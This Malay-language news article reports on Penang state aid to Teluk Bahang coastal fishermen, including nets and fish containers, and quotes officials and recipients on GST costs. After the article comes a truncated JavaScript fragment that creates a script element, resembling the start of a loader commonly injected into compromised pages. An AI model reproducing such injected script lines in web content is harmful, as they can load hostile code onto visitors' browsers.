Bantuan pukat ringan beban nelayan pantai

TELUK BAHANG – Kerajaan Negeri bertekad meneruskan pemberian bantuan peralatan menangkap ikan kepada golongan nelayan pantai di negeri ini bagi membantu meringankan bebanan golongan berkaitan.

Exco Pertanian & Industri Asas Tani, Pembangunan Desa dan Kesihatan, Dr. Afif Bahardin percaya, dengan pelaksanaan Cukai Barangan Dan Perkhidmatan (GST) pada 1 April lalu, ia sedikit sebanyak telah memberi tekanan kepada golongan nelayan pantai ekoran terdapat kenaikan kos enam peratus terhadap produk dan peralatan menangkap ikan mereka.

“Sepatutnya, Kerajaan Pusat mengecualikan GST terhadap pembelian pukat atau peralatan menangkap ikan lain dan bukannya membebankan golongan nelayan.

“Bukan ada orang lain pun nak pakai (guna) pukat ni, nelayan ja (sahaja) yang dok pakai (menggunakannya) pun,” ujarnya pada Majlis Penyerahan Bantuan Peralatan Menangkap Ikan di jeti pendaratan ikan di sini baru-baru ini.

Hadir sama, Pengarah Lembaga Kemajuan Ikan Malaysia (LKIM) Pulau Pinang, Raja Khalid Raja Ariffin; Pengerusi Persatuan Nelayan Teluk Bahang, Johari Muhammad; Penghulu Teluk Bahang, Mohd. Amin Nordin, wakil-wakil Unit Perancangan Ekonomi Negeri (UPEN) serta Pejabat Daerah dan Tanah Barat Daya.

Pegawai Penyelaras Kawasan Dewan Undangan Negeri (PPK) Teluk Bahang, Halil Sabri Hamid dan PPK Pulau Betong, Mohd. Tuah Ismail turut sama hadir pada majlis tersebut.

Menurut Afif, meskipun tidak dapat memberi bantuan sepenuhnya, Kerajaan Negeri sedayanya mengambil berat terhadap keperluan dan kebajikan lebih 3,000 nelayan pantai di Pulau Pinang dari semasa ke semasa.

“Kita (Kerajaan Negeri) telah menyediakan peruntukan sehingga RM1 juta setiap tahun bagi memberi bantuan peralatan menangkap ikan kepada nelayan pantai.

“Selain itu, Kerajaan Negeri juga mengambil beberapa inisiatif bagi meningkatkan hasil tangkapan dan nilai jualan antaranya menaik taraf beberapa tempat pendaratan ikan termasuk di Pasar Bisik dan juga cadangan pembinaan tukun-tukun tiruan di Pulau Kendi bagi menambahkan populasi ikan di kawasan tersebut,” jelas beliau.

Dalam pada itu, Afif memberitahu, Kerajaan Negeri juga mengambil pelbagai pendekatan positif dan baharu bagi membantu bukan sahaja golongan nelayan pantai, tetapi juga para petani dan penternak di Pulau Pinang.

“Semua ini untuk rakyat, membantu rakyat, mengurangkan bebanan kos sara hidup yang kian meningkat,” ujarnya.

Dalam pada itu, seorang nelayan pantai dari Pantai Acheh, di sini, Thor Kang Eng, 56, berkata, bantuan pukat udang banyak membantunya menjalankan aktiviti menangkap udang.

“Mau (mahu) beli sendiri pun mahal, kena GST lagi, setiap tiga bulan kena ganti baru.

“Saya amat menghargai bantuan pukat ini dan sebelum ini pun saya menerima bantuan yang sama sejak tiga tahun lalu,” katanya kepada Buletin Mutiara di sini baru-baru ini.

Bagi Mohd. Amin Nordin, 50, beliau menyatakan bahawa bantuan pukat bawal yang diterimanya dapat mengurangkan beban beliau sebagai nelayan pantai.

“Dengan sumbangan ini mudah-mudahan rezeki akan bertambah dan saya akan terus melakukan pekerjaan ini selagi masih sihat,” jelasnya.

Rakannya, Ismail Saad, 68, dari Batu Ferringhi di sini melahirkan rasa syukur dengan pemberian tong ikan berkapasiti 100 liter.

“Tahun lepas, saya terima pukat, tahun ni saya terima tong ikan. Alhamdulillah depa (Kerajaan Negeri) tanya apa kita nak, pakcik minta tong, dapat tong. Nak beli pun mahal, ada yang jual sampai harga RM300 seunit,” ulas Ismail.

Seramai 327 nelayan pantai dari Persatuan Nelayan Teluk Bahang menerima bantuan peralatan menangkap ikan termasuk pukat hanyut, tong simpanan dan pukat pantai.

var d=document;var s=d.createElement(‘script’);